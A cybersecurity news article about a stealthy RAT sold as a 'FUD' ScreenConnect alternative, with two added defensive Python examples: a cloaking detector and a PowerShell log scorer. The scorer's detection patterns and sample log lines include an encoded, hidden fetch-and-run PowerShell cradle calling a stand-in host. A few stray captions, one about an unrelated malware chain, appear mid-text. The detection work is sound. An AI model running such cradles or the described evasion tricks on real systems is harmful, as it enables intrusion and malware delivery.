
Threat Actors Market Stealthy New RAT as Alternative to ScreenConnect FUD

Cybersecurity researchers have identified a concerning development in the underground cybercrime marketplace: a sophisticated Remote Access Trojan (RAT) being marketed as a fully undetectable (FUD) alternative to the legitimate ScreenConnect remote access solution.

This emerging threat represents a significant escalation in the professionalization of malware-as-a-service operations, with threat actors specifically targeting the trust associated with established remote administration tools.

The malware’s primary selling proposition centers on its ability to completely bypass security warnings from both Google Chrome and Windows SmartScreen, two critical security barriers that typically protect users from malicious downloads.

According to underground forum advertisements, this evasion is achieved through the bundling of malware with valid Extended Validation (EV) certificates—high-assurance digital certificates that browsers typically display with enhanced visual trust indicators.

The threat actors have developed a comprehensive evasion toolkit that includes antibot mechanisms and cloaked landing pages.

These sophisticated features enable the malware to present benign content to automated security scanners and sandbox environments while simultaneously delivering malicious payloads to genuine targets.

This dual-presentation capability represents a significant advancement in automated analysis evasion techniques.

Common fileless attack methods include using PowerShell, phishing emails, malicious links, and legitimate-looking websites to deliver malware without traditional files.

The delivery mechanism showcases professional-grade social engineering, with threat actors creating convincing fake Adobe Acrobat Reader download pages.

This approach leverages users’ familiarity with legitimate software updates to facilitate initial compromise, demonstrating how attackers continue to exploit trusted brands for malicious purposes.
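The cloaked landing pages and fake Adobe download pages described above are easiest to spot by requesting the same URL as several different clients and comparing what comes back. The following is an added defender-side example, not code from the article or from the RAT's operators; the client profiles, the URL, and the canned "browser versus decoy" page bodies are constructed assumptions for illustration, and `fake_fetch` stands in for the live fetcher so the example runs offline:

```python
"""Check whether a landing page serves different content to different clients.

Added example (not from the article): request the same URL under several
client profiles and compare normalised response fingerprints. A page that
shows one thing to a browser and another to a scanner-like client is a
cloaking candidate that deserves manual review.
"""
import hashlib
import re
import urllib.request

# Header sets standing in for a "real browser" and for scanner-like clients.
# The exact strings are assumptions for illustration.
PROFILES = {
    "browser": {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                      "(KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36",
        "Accept-Language": "en-US,en;q=0.9",
    },
    "headless": {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) HeadlessChrome/124.0.0.0"},
    "crawler": {"User-Agent": "Googlebot/2.1 (+http://www.google.com/bot.html)"},
    "cli": {"User-Agent": "curl/8.5.0"},
}

_WS = re.compile(r"\s+")
_DOWNLOAD = re.compile(r'href="([^"]+\.(?:exe|msi|zip|js))"', re.I)


def http_fetch(url, headers, timeout=10):
    """Live fetch; returns (status, body). Used only when no fetcher is injected."""
    req = urllib.request.Request(url, headers=headers)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status, resp.read().decode("utf-8", "replace")


def fingerprint(body):
    """Hash the body with whitespace collapsed so formatting noise is ignored."""
    return hashlib.sha256(_WS.sub(" ", body).strip().encode()).hexdigest()[:16]


def compare_profiles(url, fetch=http_fetch, profiles=PROFILES):
    """Fetch under every profile and report which ones diverge from the browser view."""
    # Fetch the browser profile twice first: if the page changes between two
    # identical requests it is dynamic, and a cross-profile difference proves nothing.
    base_a = fingerprint(fetch(url, profiles["browser"])[1])
    base_b = fingerprint(fetch(url, profiles["browser"])[1])
    if base_a != base_b:
        return {"url": url, "verdict": "inconclusive", "profiles": {}, "diverging": []}
    seen = {}
    for name, headers in profiles.items():
        status, body = fetch(url, headers)
        seen[name] = {
            "status": status,
            "fingerprint": fingerprint(body),
            "downloads": sorted(set(_DOWNLOAD.findall(body))),
        }
    diverging = [n for n, r in seen.items() if r["fingerprint"] != base_a]
    verdict = "cloaking-candidate" if diverging else "consistent"
    return {"url": url, "verdict": verdict, "profiles": seen, "diverging": diverging}


# --- constructed offline stand-in for a cloaked fake download page ---------
_BROWSER_PAGE = ('<html><body><h1>Adobe Acrobat Reader</h1>'
                 '<a href="/files/AcrobatReaderSetup.exe">Download now</a></body></html>')
_DECOY_PAGE = '<html><body><h1>Site under construction</h1></body></html>'


def fake_fetch(url, headers):
    """Serves the download page only to a Chrome-on-Windows client; decoy otherwise."""
    ua = headers.get("User-Agent", "")
    if "Windows NT" in ua and "HeadlessChrome" not in ua:
        return 200, _BROWSER_PAGE
    return 200, _DECOY_PAGE


def demo():
    """Run the comparison against the constructed cloaked page (no network)."""
    return compare_profiles("https://example.invalid/reader", fetch=fake_fetch)


if __name__ == "__main__":
    print(demo())
```

The baseline double-fetch matters in practice: many legitimate pages embed per-request tokens or rotating content, so a single cross-profile mismatch is only meaningful once the page has been shown to be stable for identical requests. Real analysis would also vary source IP and `Referer`, since antibot gating frequently keys on those rather than on the user agent alone.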

ScreenConnect FUD

Technical analysis reveals that the RAT employs fileless execution techniques, primarily utilizing PowerShell-based commands to load its executable payload directly into memory.

This approach allows the malware to operate without writing persistent files to disk, significantly reducing its detectability by traditional antivirus solutions that rely on file-based scanning mechanisms.
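Because the loader stages its payload through PowerShell rather than through a file on disk, the most useful telemetry is PowerShell script block logging (Event ID 4104) rather than file scanning. The following added example, which is not code from the article or from the RAT, scores logged script blocks against common in-memory loader indicators and decodes `-EncodedCommand` payloads so that the indicators inside them are visible too; the indicator list, the two-indicator threshold, and the sample log lines are constructed assumptions, not observations about this specific malware:

```python
"""Flag PowerShell script-block log lines that match in-memory loader patterns.

Added example (not from the article): a small scorer for Event ID 4104 text.
Indicators and sample lines are constructed assumptions for illustration.
"""
import base64
import re

# Each indicator is a label paired with a pattern. A single match is often
# legitimate administration, so the verdict below requires at least two.
INDICATORS = [
    ("invoke_expression", re.compile(r"\b(iex|invoke-expression)\b", re.I)),
    ("download_cradle", re.compile(r"\.(DownloadString|DownloadData)\s*\(", re.I)),
    ("reflective_load", re.compile(
        r"\[\s*(System\.)?Reflection\.Assembly\s*\]\s*::\s*Load", re.I)),
    ("base64_decode", re.compile(r"FromBase64String\s*\(", re.I)),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    ("bypass_policy", re.compile(r"-ep\s+bypass|-executionpolicy\s+bypass", re.I)),
]

# -EncodedCommand (and its short forms) carries a base64 blob of UTF-16LE text.
ENCODED_CMD = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(line):
    """Return the decoded -EncodedCommand payload if the line carries one, else None."""
    m = ENCODED_CMD.search(line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_line(line):
    """Score one script block; indicators found inside a decoded payload count too."""
    decoded = decode_encoded_command(line)
    text = line if decoded is None else line + "\n" + decoded
    hits = [name for name, rx in INDICATORS if rx.search(text)]
    if decoded is not None:
        hits.insert(0, "encoded_command")
    return {"line": line, "decoded": decoded,
            "indicators": hits, "suspicious": len(hits) >= 2}


def scan(lines):
    """Return only the records the threshold marks as suspicious."""
    return [r for r in (analyze_line(l) for l in lines) if r["suspicious"]]


# Constructed sample script blocks. The encoded one is built here from a
# plain download cradle so the example needs no hand-written base64.
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')"
_B64 = base64.b64encode(_CRADLE.encode("utf-16-le")).decode()

SAMPLE_LOG = [
    "Get-Process | Where-Object { $_.CPU -gt 100 }",
    "powershell.exe -nop -w hidden -ep bypass -enc " + _B64,
    "[System.Reflection.Assembly]::Load([Convert]::FromBase64String($blob))"
    ".EntryPoint.Invoke($null, $null)",
    r"Invoke-Expression (Get-Content .\script.ps1 -Raw)",
]


if __name__ == "__main__":
    for rec in scan(SAMPLE_LOG):
        print(rec["indicators"], "<-", rec["line"][:60])
```

Script block logging records the de-obfuscated text PowerShell actually executes, which is why it catches the reflective-load line even though nothing touches disk; the scorer only adds the `-EncodedCommand` decoding because the launch command line itself (from process creation auditing) is still encoded when it reaches the log.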

The remote access capabilities include a comprehensive remote viewer function, granting attackers real-time visual control over compromised systems.

This functionality enables continuous monitoring, interactive data exfiltration, and dynamic system manipulation without requiring additional tool deployment.

Flowchart showing the infection chain of the JS_POWMET fileless malware and delivery of the BKDR_ANDROM payload.

The threat actor’s sales approach demonstrates a highly organized cybercrime-as-a-service model. Advertisements explicitly position the tool as a “FUD loader,” indicating its intended use as a primary infection vector for establishing persistent system access before deploying secondary payloads such as ransomware, banking trojans, or espionage tools.

The seller’s promise of demo availability and 24-hour delivery timelines suggests a mature operational infrastructure designed to support scalable malware distribution.

This professional approach mirrors legitimate software sales models, highlighting the increasing sophistication of cybercriminal enterprises.

Growing Threat Landscape

This development reflects broader trends in the cyberthreat landscape, where attackers increasingly focus on exploiting user trust in legitimate brands and circumventing modern security technologies.

The specific targeting of ScreenConnect's reputation indicates that threat actors are systematically identifying and exploiting trust relationships between users and established remote access solutions.

The integration of valid EV certificates with malicious payloads represents a particularly concerning evolution, as it directly undermines one of the internet’s fundamental trust mechanisms.

This technique could potentially scale across multiple attack campaigns, making detection significantly more challenging for both automated systems and end users.

Security professionals should anticipate increased instances of legitimate brand impersonation and enhanced evasion techniques as threat actors continue professionalizing their operations.

Organizations utilizing remote access tools should implement additional verification procedures and maintain heightened awareness of social engineering attempts targeting their trusted software relationships.
